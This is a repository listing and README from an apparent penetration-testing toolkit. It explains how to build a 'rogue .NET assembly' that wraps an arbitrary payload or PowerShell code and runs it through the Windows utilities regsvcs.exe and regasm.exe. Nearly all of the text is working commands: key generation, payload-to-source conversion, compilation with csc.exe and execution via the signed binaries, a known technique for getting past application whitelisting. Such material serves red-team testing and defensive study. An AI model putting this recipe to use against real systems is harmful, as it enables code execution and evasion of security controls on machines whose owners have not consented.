mgeeky-Penetration-Testing-Tools

History

Mariusz B. / mgeeky 2af3ce7d73 Added regsvcs directory		2020-04-30 16:54:36 -04:00
..
README.md	Added regsvcs directory	2020-04-30 16:54:36 -04:00
System.Management.Automation.dll	Added regsvcs directory	2020-04-30 16:54:36 -04:00
build.ps1	Added regsvcs directory	2020-04-30 16:54:36 -04:00
generateRegsvcs.py	Added regsvcs directory	2020-04-30 16:54:36 -04:00
key.snk	Added regsvcs directory	2020-04-30 16:54:36 -04:00
program.cs	Added regsvcs directory	2020-04-30 16:54:36 -04:00
regsvcs.dll	Added regsvcs directory	2020-04-30 16:54:36 -04:00

README.md

Rogue .NET Assembly for Regsvcs/Regasm Code Execution

Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs:

Step 1: Generate key.snk file

powershell -file build.ps1

Step 2: Generate source code file

python3 generateRegsvcs.py -r payload.bin > program.cs

Step 3: Compilate library .NET Assembly

%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs

If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:

%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs

Step 4: Code execution via Regsvcs or Regasm:

%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll

%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll

%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll

%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll